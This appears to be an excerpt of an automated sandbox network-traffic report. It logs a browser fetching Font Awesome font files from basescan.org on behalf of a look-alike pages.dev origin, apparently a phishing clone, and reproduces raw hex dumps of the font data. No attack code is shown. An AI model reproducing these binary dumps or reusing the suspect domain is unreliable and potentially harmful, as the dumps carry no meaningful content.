                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC1369INData Raw: df 56 61 3b 90 fc 88 fc 98 78 8b fc 82 fc 75 cd 6b 97 f3 77 f2 7f c4 57 14 6a 0a 22 a9 a9 a8 69 68 13 52 d3 51 b3 d2 26 a1 66 a7 e6 a0 4d 4b cd 49 e1 68 19 6a 2e 6a 51 da f4 d4 e2 d4 aa eb 7a 0f a9 d5 a9 8d e6 30 7d 6d b2 8d b4 e5 a9 cd a9 ed d6 19 97 d4 be d4 7e b4 35 a8 43 51 5b 8b 3a 42 a3 d7 a8 23 27 8e 5e a7 8e a5 8e a3 ad 4d 9d 40 9d 48 5b 97 3a 5d 05 6d 7d ea 22 ea 62 da 06 d4 e5 52 db 88 ba 46 6d 63 ea ae 91 b6 09 f5 28 f5 d8 7c 6c 49 3d 41 3d 49 db 9c 7a 06 b5 2d a9 17 0a da 56 d4 2b d4 6b b4 ad a9 37 54 d0 b6 a3 3e a1 3e a5 6d 4f 7d 2e b5 1d a9 6f d4 76 a2 7e 29 68 3b 53 bf 53 49 db 85 1a 54 d0 76 a7 fe 45 fd 87 b6 07 f5 5f 15 8c 37 0f f5 7f 86 31 68 7b 33 8c 54 d0 f6 63 98 88 61 12 da fe 0c 33 48 ed 20 86 99 d4 0e 66 98 79 85 f1 18 c3 9c 0c 2b
                                                                                                                                                                                                                                              Data Ascii: Va;xukwWj"ihRQ&fMKIhj.jQz0}m~5CQ[:B#'^M@H[:]m}"bRFmc(|lI=A=Iz-V+k7T>>mO}.ov~)h;SSITvE_71h{3Tca3H fy+
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC1369INData Raw: ac 1b 69 ba 23 eb 41 9a 7e c8 7a 92 a6 03 b2 3e a4 7e 0f 59 5f d2 b4 c8 fa 93 fa 53 64 c3 48 39 0b d9 48 d2 4c 46 b6 08 49 fb 20 5b 94 d4 9d 91 2d 4e ea 9e c8 56 20 79 02 b2 15 49 9e 88 6c 15 52 16 47 b6 1a a9 0b b2 35 48 d9 15 d9 e6 24 8d 46 b6 05 29 53 91 ed 45 da de c8 f6 23 f5 37 c8 0e 20 ed 53 c8 0e 24 ed d3 c8 0e 26 65 3b 64 c7 90 ea 75 64 27 92 6a 7d 64 a7 93 e6 12 64 e7 90 34 12 d9 b9 89 f6 3c 92 5f 7b 3e 29 5c 7b 11 a4 74 41 76 09 49 2f 20 bb 8c e4 f5 90 5d 4e da 75 91 5d 45 d2 9a c8 ae 21 f9 17 64 d7 93 ea 57 64 37 91 4e 9d 90 dd 4c da ce c8 6e 25 74 42 76 1b 49 e7 20 bb 8f a4 2f 90 dd 4f d2 b5 c8 1e 20 ed de c8 1e 24 e9 36 64 0f 91 b2 28 b2 87 93 bd 7d 04 92 8e 40 f6 28 49 47 22 7b 9c e4 11 c8 9e 20 59 c8 9e 4c b4 cf 40 ea f5 90 3d 47 aa fe c8
                                                                                                                                                                                                                                              Data Ascii: i#A~z>~Y_SdH9HLFI [-NV yIlRG5H$F)SE#7 S$&e;dud'j}dd4<_{>)\{tAvI/ ]Nu]E!dWd7NLn%tBvI /O $6d(}@(IG"{ YL@=G


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              74192.168.2.549812104.26.13.1134435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC709OUTGET /assets/vendor/font-awesome/webfonts/fa-regular-400.woff2 HTTP/1.1
                                                                                                                                                                                                                                              Host: basescan.org
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: font
                                                                                                                                                                                                                                              Referer: https://basescan.org/assets/vendor/font-awesome/css/fontawesome-all.min.css?v=24.4.4.9
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC810INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:04 GMT
                                                                                                                                                                                                                                              Content-Type: application/font-woff2
                                                                                                                                                                                                                                              Content-Length: 418952
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: max-age=1209600
                                                                                                                                                                                                                                              Last-Modified: Wed, 28 Feb 2024 00:49:24 GMT
                                                                                                                                                                                                                                              ETag: "0c22df9df69da1:0"
                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                              Referrer-Policy: origin-when-cross-origin
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                              Age: 59656
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zl3XZKhXT%2BNw4rkfPwPd55N%2Bx0ytR2ZIVUKb9gfjht8G3Ze1mHsj9KgIad6tCGapeW3SbLb140EBLeTXvZzb%2ByPjHSbk2Mvh%2Fuubd2zJZekdjkiWttmeOiAaGJwi8w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2d22e050c8a-EWR
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC559INData Raw: 77 4f 46 32 00 01 00 00 00 06 64 88 00 0a 00 00 00 10 90 97 00 06 64 3c 03 05 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 36 02 24 04 20 06 60 03 e6 48 00 81 90 78 ca bf b9 18 cb e6 4c 05 87 79 07 20 a5 ff ff 92 89 b2 fb 00 00 a0 24 98 1e 00 00 5e ed 3e 14 45 49 2d f6 f0 98 01 8d ea 01 00 a0 d9 ef 21 a0 aa aa aa aa aa aa 99 09 01 c7 b5 6d af 0a 00 00 82 1f fd e4 67 bf f8 d5 6f fc d6 ef fc de 1f fc d1 9f fc d9 5f fc d5 df fc dd 3f fc d3 bf fc db 7f fc d7 ff fc df 7f 0c 0c c6 dd 03 10 a6 65 b3 3b 9c 2e b7 c7 eb f3 1b fe ff 7f bf cf 6f ae 55 55 3f af 2a 74 43 7c df a7 06 15 dd b8 a3 1a 00 15 0b 4b ab 11 84 ea e1 59 c5 1f 1f f7 85 6b 23 02 f7 d1 3e c2 7b fb 79 28 e0 24 db 37 db 36 67 e4 28 e7 53 7e 1f 72 7c d0 6c c1 bb db 45 36 bf e7
                                                                                                                                                                                                                                              Data Ascii: wOF2dd<6$ `HxLy $^>EI-!mgo_?e;.oUU?*tC|KYk#>{y($76g(S~r|lE6
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC1369INData Raw: c3 99 47 89 96 43 c7 b4 ad 8d b6 c8 a9 4a 67 ba 9c ca 3d f2 4f b4 9d e9 ce 56 a6 75 a4 c9 fa 5d db 9d ad f8 7d b7 2b e9 eb fc 82 6d 5d bf 34 78 17 f8 ff bf a9 d5 bb af 54 f5 8a 54 c5 f7 49 b2 64 4b 2a ab 9e 1d 43 ea a9 a4 7a 09 cb 1d a7 3b 43 69 35 07 1a dc 9c 61 0f b1 07 37 bd d8 b0 30 c3 5e 9e 61 2f b1 66 b8 67 29 fb 45 5f 59 e6 9e 3d b3 f2 4f e4 ab da bc d9 dd 99 ad 33 5b 67 7e c3 6f 8b bf fb 41 00 c4 ce 5f fc 5d 10 6c 5f 94 44 41 a6 0a 44 da 12 28 db 32 e4 4a 77 2a 92 65 a5 49 b0 4f b1 e8 8e 14 c7 72 a7 bb d2 e9 d6 71 f6 e5 ec 73 ae e0 7a d2 99 ee eb f2 a5 39 ed f3 ff 72 56 fe 5f 5e ab 04 96 4a aa 6e 95 da ad 99 b6 c0 38 a8 b2 46 ed 1e d6 12 7b 81 07 b4 c4 5e 62 2f b1 6f eb dd 90 33 ef 9e 38 40 37 87 78 e1 94 d3 f6 31 61 bf 9c 72 52 7e 42 55 fd f7 8e
                                                                                                                                                                                                                                              Data Ascii: GCJg=OVu]}+m]4xTTIdK*Cz;Ci5a70^a/fg)E_Y=O3[g~oA_]l_DAD(2Jw*eIOrqsz9rV_^Jn8F{^b/o38@7x1arR~BU
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC1369INData Raw: 04 98 cf bd 0f 70 81 e9 8d b2 86 c5 7b ad 03 a6 f7 78 49 d6 96 8e 93 9f c7 7b ef 35 c5 0f 3e 7f b1 04 5c bd 71 31 bb 98 e7 b3 bf fb 2e e2 ac 5c 9b e3 df 29 e0 f4 c1 f4 9e 16 82 47 bd 5e f8 74 c7 6c d4 b3 0d 70 dd e9 45 83 b5 06 6b c3 e5 b5 1a 06 d3 3c 70 6e 33 b7 8c af d9 01 8d de cb 89 75 f5 77 e8 6c 38 55 b8 b3 07 88 c3 6c d5 8b 8b f5 33 18 73 00 94 85 66 8d 5e de 73 4e af 1b d2 cb d8 71 fb 95 f6 99 c1 04 4c ba 06 7b ed 2f 3a b4 f0 0e ef e1 5a 74 2e b2 9f 64 df 9c c7 cf 67 4b b7 d3 8d 0b ae 21 ee e7 03 0e c5 4f bd e4 45 0b 1f 54 70 e6 13 d3 87 e7 7e b9 b7 0f af c3 1e fd d9 37 78 dc a9 43 53 bd 5f dc 7d 43 fb e8 13 d9 e5 b6 66 b6 02 8d 5e e4 f0 41 98 3e 40 5c 87 3e cb 4d ef 9c de f1 a2 4f 83 59 6e 84 dd a2 76 c1 33 88 b4 8c 1f 26 dd c7 b1 bd 06 4c 6f 4d
                                                                                                                                                                                                                                              Data Ascii: p{xI{5>\q1.\)G^tlpEk<pn3uwl8Ul3sf^sNqL{/:Zt.dgK!OETp~7xCS_}Cf^A>@\>MOYnv3&LoM
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC1369INData Raw: 6d 58 ef ef e2 05 2a d6 26 57 cc e0 20 7f 69 dd a8 7b 93 7c 04 c6 4f d0 e8 57 b8 42 6d 53 7b 89 1b c9 61 44 cc 1c 0a 28 c7 61 46 1c ae ee 63 9f 06 2b de 90 da 9f 2d 9e f1 39 da 15 a8 7a ab ea 6d ab ce aa ba 9c bd 85 ba 73 66 5a 4b b5 bc 8f 0d 93 86 cd 02 dd 80 1a 22 e8 98 1e 99 d7 12 e3 6b e2 b9 fd a4 df d1 42 c5 5a 75 0f 73 91 66 85 69 9c 02 22 3d c6 a8 41 e6 70 4d 83 8b b2 32 cd e9 85 39 12 c5 7b e9 00 b9 d0 2e e7 f9 5c 8f 7c b1 b9 43 34 38 23 9c c5 83 4e e1 ea 4b 8d 83 c8 03 7d 96 29 50 f5 67 b4 ea 7f 51 5d b3 d6 f0 0d ba 63 ed f0 6e ff 1d 85 3b 72 b1 ad 2a ac c2 a6 f7 fa 2b ae 59 3e c3 7d 0f ea 63 ac 17 99 f4 29 fa b1 97 c4 f0 74 05 71 7d 51 2f 36 47 5d 59 b6 8f a0 23 88 37 d6 76 68 6d 6a a2 e9 ad be 62 6e 5e 55 f8 83 78 31 c7 f6 e6 14 47 60 ee 43 71
                                                                                                                                                                                                                                              Data Ascii: mX*&W i{|OWBmS{aD(aFc+-9zmsfZK"kBZusfi"=ApM29{.\|C48#NK})PgQ]cn;r*+Y>}c)tq}Q/6G]Y#7vhmjbn^Ux1G`Cq
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC1369INData Raw: 5e f2 73 66 2f c0 5e a1 3c 4b f4 df 09 e5 2f 5c 26 fa e4 85 50 fc bb 3c c9 1a 22 c6 a8 91 e7 ea a7 28 2f 45 41 a5 dd 12 eb 24 4d 48 eb 0d f8 99 e3 2c c3 26 40 3c 05 f6 5f 97 e3 c9 37 4b f8 9d 8c 6e f4 db 20 fe 01 b9 8f 2a 21 b9 a2 b4 33 9a e1 1b 42 5d 85 92 3a 67 51 3f 16 7c 9b 55 c7 00 5d a3 7a 07 b9 54 43 5b 18 6c 28 c8 8e 1e 91 07 e2 eb 71 4f 39 a4 df a6 9a 20 23 fd 10 8a cb 73 39 03 f7 47 c8 5f 69 ac 82 76 5b 07 3b 2c 62 06 1f 88 4d 7c 4c c8 63 02 29 de d2 fb 9a f9 0e ed 59 1a ca 33 22 07 d4 8f 2d 62 ca b6 b0 29 3b 42 63 f7 30 7c 2e 19 bc b6 57 d6 63 75 05 ed de 67 11 00 a2 00 10 01 80 6a 00 88 02 14 2c 84 c8 ff 3b f4 ff 9d 00 54 43 04 52 01 0a 16 42 b4 a0 1f 40 f4 a3 28 40 0a 7c 04 8b 60 29 2c 83 e5 b0 02 56 c2 2a 58 0d 6b 60 2d ac 83 f5 b0 01 36 c2
                                                                                                                                                                                                                                              Data Ascii: ^sf/^<K/\&P<"(/EA$MH,&@<_7Kn *!3B]:gQ?|U]zTC[l(qO9 #s9G_iv[;,bM|Lc)Y3"-b);Bc0|.Wcugj,;TCRB@(@|`),V*Xk`-6
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC1369INData Raw: f1 a5 14 fa df 2b e5 b5 f4 5a 79 9d bc ce de 28 ef 84 f7 d0 7b e6 05 3d cf fb eb fd eb 81 27 bd 28 2f c6 4f 71 2c 87 f9 79 fd a2 7e 49 bf ba 5f db ef e6 f7 e5 16 8f c7 e3 f3 84 3c 11 4f 7d 5c 35 d3 e3 72 f1 9a bc d6 23 1b f0 96 f7 ec f9 01 0f e6 23 f9 4c 3e c7 b3 8c af e4 6b ea d9 ca 77 f2 dd 7c 0f 3f c9 6f f2 97 fc 3d b7 b9 73 3c f2 27 e7 e5 0d 58 90 18 92 40 72 48 01 a9 8f a1 cc 1e 06 79 20 ef 17 ac 08 94 84 0a 50 0d 6a 42 03 68 08 2d a1 1d b4 87 2e d0 13 c6 c1 6c 98 77 dc 7b d5 c3 b7 c2 91 67 3c 0d 17 e1 26 3c 7b dc 57 b0 e1 cf c1 34 10 09 51 68 61 7c 4c 8a 99 30 17 96 c1 8a 58 13 1b 63 33 6c 89 ad 70 28 8e c2 89 38 e9 b8 ea ca 0f fa 36 dc 89 07 f0 6c 7b 6e e1 1d 7c 80 2f f1 2d 7e c1 20 72 b2 28 3b 31 2a 49 a5 a9 0c d5 a4 96 d4 8d 7a d2 f8 e3 69 e7 d3
                                                                                                                                                                                                                                              Data Ascii: +Zy({='(/Oq,y~I_<O}\5r##L>kw|?o=s<'X@rHy PjBh-.lw{g<&<{W4Qha|L0Xc3lp(86l{n|/-~ r(;1*Izi
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC1369INData Raw: ba f0 5c 9e 0e 60 4d 0f 96 61 2f 0f ac b3 b1 60 b5 4f e4 f8 6d 28 84 b1 dc 6a 6c 2c d8 f8 3d d4 33 19 2c 3b fc 04 1b 0d 36 12 42 c9 4f 7a 4d fb 69 dd c1 ba 82 75 06 eb 18 86 82 b5 05 b0 ad 7c 64 87 fe 4d a7 05 61 7b d8 4e 31 db 1a 79 5b 21 fb 29 42 4f b0 fa f7 0f ef 5f 07 6c 07 b6 02 6b 81 c5 94 77 c6 fd cc 5f cb 78 56 f6 de 6b b4 12 1a 57 de c4 02 27 92 20 95 34 f2 53 80 82 14 a2 30 45 28 4a 31 8a 53 82 92 94 a2 34 65 28 4b 39 ca 53 81 8a 54 a2 32 55 a8 4a 35 aa 53 83 9a d4 a2 36 75 a8 4b 53 df 13 f3 c5 a2 71 4e 9c 9b 58 94 d8 ae a2 2a a6 e2 2a a3 b2 aa a0 4a aa ac 1a aa a3 66 6a ae 16 ea a1 be ea a7 fe 1a a0 81 1a a4 c1 1a aa 61 1a ae 51 1a ad 31 9a a0 89 9a a4 c9 9a ae 79 5a a4 15 5a a9 0d da a8 3d 3a ac 8b ba ac eb ba af 97 7a a5 37 fa a8 4f fa ac ef
                                                                                                                                                                                                                                              Data Ascii: \`Ma/`Om(jl,=3,;6BOzMiu|dMa{N1y[!)BO_lkw_xVkW' 4S0E(J1S4e(K9ST2UJ5S6uKSqNX**JfjaQ1yZZ=:z7O
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC1369INData Raw: 5c 42 5c 42 7d 19 71 19 71 19 ed b7 c4 e5 c4 e5 54 cb 10 57 12 57 d2 fb 92 b8 8e b8 8e ea 48 e2 7a e2 7a aa d7 89 1b 88 1b a8 8f 25 6e 24 6e a4 3e 8e b8 89 b8 89 fa 78 e2 66 e2 66 ea a3 89 5b 88 5b a8 4f 20 6e 25 6e a5 3e 86 b8 8d b8 8d fa 44 e2 76 e2 76 ea 93 88 3b 88 3b a8 be 25 ee 24 ee a4 fa 96 b8 8f b8 8f fe fb c4 03 c4 03 d4 27 13 4f 13 4f 53 ef 4c 3c 43 3c 43 73 0c f1 12 f1 12 ed f3 c4 cb c4 cb f4 df 25 5e 21 5e a1 5d 83 58 42 2c a1 7a 8a f8 8a f8 8a 76 32 f1 35 f1 35 fd bb 89 6f 88 6f e8 ad 4e fc 44 fc 44 3b 94 f8 93 f8 93 f6 09 e2 2f e2 2f da 9b 88 7f 88 7f e8 bf 42 fc 4f fc 4f 6f 0b 52 95 28 53 dd 47 0e 26 07 d7 3d 43 c9 a1 17 f7 30 72 18 f5 38 b2 21 1b 9a 03 c8 1e d9 a3 7a 85 ec 93 7d fa 9f 93 2d d9 52 5f 43 0e 27 87 53 df 48 8e 22 47 51 ff 4e
                                                                                                                                                                                                                                              Data Ascii: \B\B}qqTWWHzz%n$n>xff[[O n%n>Dvv;;%$'OOSL<C<Cs%^!^]XB,zv255ooNDD;//BOOoR(SG&=C0r8!z}-R_C'SH"GQN
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC1369INData Raw: c4 d7 c4 4f 94 67 89 20 7e a5 bc 4a fc 46 fc 46 7d 9f f8 9d f8 9d 3a 9a f8 83 f8 83 ba 04 f1 27 f1 3f e5 2d 12 59 29 1f 92 1d 64 07 1d 1b 92 9d c8 2e 94 2f c9 ae 64 57 ca f7 64 37 b2 3b e5 1b b2 27 d9 8b f2 1d d9 9b ec 4d c7 2e 64 5f b2 2f e5 38 b2 1f d9 8f 72 3c 39 90 1c 4a f9 81 1c 46 0e a3 2c 44 0e 27 87 53 92 1c 49 8e a6 34 72 0c 39 86 72 3a 39 96 9c 40 f9 8d 9c 48 4e c4 08 72 12 39 89 f2 17 39 99 9c 8c d9 c8 29 e4 74 ca df e4 4c 72 3e ca ff e4 02 e4 c2 d4 39 c9 c5 c8 c5 a9 1d e4 92 e4 f2 d4 ce e4 0a e4 0a d4 9e e4 8a e4 ea d4 5e e4 9a e4 ba d4 81 e4 7a e4 7a 98 93 5c 9f dc 88 3a 8c dc 84 dc 9c 3a 8a dc 92 dc 8e 3a 8e dc 8f 3c 90 3a 85 3c 9a 3c 86 3a 83 3c 8e 3c 91 3a 8b 3c 9d 3c 9d 8e e5 c9 33 c9 33 e9 58 8e 3c 8b 3c 87 3a 1f 79 1e 79 1e 75 41 f2 7c
                                                                                                                                                                                                                                              Data Ascii: Og ~JFF}:'?-Y)d./dWd7;'M.d_/8r<9JF,D'SI4r9r:9@HNr99)tLr>9^zz\:::<:<<:<<:<<33X<<:yyuA|
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC1369INData Raw: 57 d1 2d 48 bd 86 7a 13 dd a1 d4 5b a8 4f d0 1d 43 7d 92 fa 24 c3 c7 50 9f a2 be 46 77 21 f5 0d ea 7b 74 d7 51 3f a0 7e 4b 77 2b f5 7b ea 8f 74 0f 53 7f a2 fe c4 e8 cd d4 9f a9 bf d0 3d 46 fd 8d fa 3f dd 13 c2 ec 63 84 d9 c7 d0 6c 2b a4 61 21 0d 13 77 13 d2 a8 90 46 89 bb 0b 69 82 90 26 10 b7 11 52 14 52 24 1e 20 a4 31 21 8d d1 5c 21 a4 71 21 8d d3 5c 29 a4 39 84 34 07 cd 55 42 9a 53 48 73 32 72 b3 90 e6 15 d2 bc 8c ae 26 a4 45 84 b4 08 0e 12 d2 a2 42 5a 94 d1 d7 84 b4 84 90 96 20 ee 2c a4 a5 84 b4 14 71 96 90 96 16 d2 d2 c4 29 42 5a 46 48 cb 10 67 0a 69 59 21 2d 4b dc 47 48 cb 09 69 39 e2 fe 42 5a 5e 48 cb 13 d7 17 d2 8a 42 5a 91 58 84 b4 92 90 56 a2 1b 17 d2 ca 42 5a 99 88 87 6f 62 7a 30 3d 50 7c 80 99 80 99 00 e5 10 cc 44 cc 44 68 ef 86 99 84 99 04 9d
                                                                                                                                                                                                                                              Data Ascii: W-Hz[OC}$PFw!{tQ?~Kw+{tS=F?cl+a!wFi&RR$ 1!\!q!\)94UBSHs2r&EBZ ,q)BZFHgiY!-KGHi9BZ^HBZXVBZobz0=P|DDh


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              75192.168.2.549814104.26.13.1134435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC707OUTGET /assets/vendor/font-awesome/webfonts/fa-light-300.woff2 HTTP/1.1
                                                                                                                                                                                                                                              Host: basescan.org
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: font
                                                                                                                                                                                                                                              Referer: https://basescan.org/assets/vendor/font-awesome/css/fontawesome-all.min.css?v=24.4.4.9
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC838INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:04 GMT
                                                                                                                                                                                                                                              Content-Type: application/font-woff2
                                                                                                                                                                                                                                              Content-Length: 458056
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: max-age=1209600
                                                                                                                                                                                                                                              Last-Modified: Wed, 28 Feb 2024 00:49:24 GMT
                                                                                                                                                                                                                                              ETag: "0c22df9df69da1:0"
                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                              Referrer-Policy: origin-when-cross-origin
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                              Age: 59656
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YIOqblUlUPje8Gp1tC4vtDfchm9dUiBiLTSf3PDhLYTmNFWxkdel%2BZgTIDNb2MBMU7p1x%2BkNWA8SUB%2BYQBHd6A5Cc6RQ7dAXpMpf1Ymfj6niMGP3GUiz4hFhJvvY1Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2d25fc84370-EWR
                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC531INData Raw: 77 4f 46 32 00 01 00 00 00 06 fd 48 00 0a 00 00 00 12 9b ef 00 06 fc fa 03 05 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 36 02 24 04 20 06 60 03 e6 48 00 81 90 78 ca c7 d0 08 cb e6 4c 05 87 61 07 20 a5 ff 7f 93 89 b2 fb 00 00 28 12 4c 0f 00 00 5f 75 1e 8a a2 a4 36 7b 78 ca 80 45 f5 00 00 b0 e6 ef 21 a0 aa aa aa aa aa aa 99 09 01 c7 b5 6d af 0a 00 00 82 1f fd e4 67 bf f8 d5 6f fc d6 ef fc de 1f fc d1 9f fc d9 5f fc d5 df fc dd 3f fc d3 bf fc db 7f fc d7 ff fc df 7f 0a 0c c6 dd 3f 10 a6 65 3b 2e b7 c7 eb f3 1b fe ff df 5f 66 fb dc 92 5a 65 a9 5a 7a b6 d5 a6 92 db cf 90 95 39 02 ba b6 07 30 22 8e 08 56 4e 67 88 92 68 82 84 f3 b7 f2 8e 1c 64 13 44 06 94 fe af 7f 7f 1e 4f 7b c5 00 27 cd fa fe b6 9e 91 a3 dc 03 e4 14 c9 41 ef ed a4 63
                                                                                                                                                                                                                                              Data Ascii: wOF2H6$ `HxLa (L_u6{xE!mgo_??e;._fZeZz90"VNghdDO{'Ac
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC1369INData Raw: 52 84 12 43 94 11 b2 64 5b 90 56 86 3d 6d 57 2b 9c ce 88 82 a9 2d ef 74 f5 00 d6 12 7b 88 6b 89 35 c0 b5 fb bd 80 43 6a a0 8f 5e 62 0d d4 7e a0 9a 25 e8 a3 4f 5c 1f 48 dd 23 1d 91 95 eb 3f 23 ab 2a b3 b2 b2 2a b3 7c 76 fb ea ae 99 aa b1 3b 9d 5d d3 55 bb 3b bb ab 96 b4 32 7e 30 42 2b 24 d0 08 2b 40 82 95 70 3a e0 60 10 e6 84 3b e6 0c 20 38 c3 1c a7 bb c7 f9 3d cf 03 71 f4 39 bf cf b8 73 7f 78 ce ea 3d ff 31 3d 3f a1 ce af f7 d4 46 d2 58 1a 29 96 34 0e c6 60 ac 58 83 21 c5 0f 5b 9a a4 8b 2c d9 16 f8 cb df 02 9f 5f cd de 5d b2 db f9 7f 4b e7 d8 d2 3a 57 b7 b4 ec b5 ca 95 d6 b9 d2 9a e3 ff 3f aa 5a ef 82 04 3e f1 3f 80 0f b0 e0 93 a2 44 02 a2 04 a8 39 e1 17 2d c0 71 e2 89 d2 9d ae 13 4f 2b 4c 71 fa cc 2a dd d3 99 d6 39 ad 6b 8a a7 54 6d d7 74 4e eb de 52 a7
                                                                                                                                                                                                                                              Data Ascii: RCd[V=mW+-t{k5Cj^b~%O\H#?#**|v;]U;2~0B+$+@p:`; 8=q9sx=1=?FX)4`X![,_]K:W?Z>?D9-qO+Lq*9kTmtNR
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC1369INData Raw: 09 16 2f 0c 50 d6 8c cf c6 74 01 24 4d d0 35 20 0c 61 7a 00 01 68 c0 7d 22 18 13 23 d6 ef 31 b2 a6 30 84 db 76 8e 9f f2 f3 00 e1 94 84 e0 73 ef 03 22 21 a8 2b 79 0d c1 b8 d6 86 a0 16 bc 14 6b 2b df 53 b7 9d da c7 9a f4 83 cf 3f 54 0c 91 35 47 d2 23 e9 f3 59 df 1e 8b 38 bb ae 2d e3 df c9 10 ae 7d 50 0b 2d fb 62 76 df a6 87 6b e2 d3 0d dd c8 67 6b e0 3c 5c 93 06 0f 6a f0 60 c0 d9 5a a3 06 6d 1e 68 6b f0 5e e6 6b ae 41 a3 16 39 59 fc 0e 0d d6 32 3d a8 49 66 bb 07 f6 1a 87 99 b2 a6 48 76 cf 84 e4 20 2d b3 95 85 e2 b5 46 4d 1a ac e5 c2 de de 3b ae a9 7f 96 c8 75 a9 7d 96 60 12 9a ae d1 5e 2b e9 d0 bc 6f d8 87 6b f1 b9 d8 7e b2 7d b3 9f 79 3e 93 ab c2 55 b8 e0 1a d4 5f 08 84 49 7e ea 29 2f 9a f9 e0 06 73 0f 83 aa 80 8f 1e f0 d9 93 f7 d1 57 63 f6 08 1e 6f d2 ad
                                                                                                                                                                                                                                              Data Ascii: /Pt$M5 azh}"#10vs"!+yk+S?T5G#Y8-}P-bvkgk<\j`Zmhk^kA9Y2=IfHv -FM;u}`^+ok~}y>U_I~)/sWco
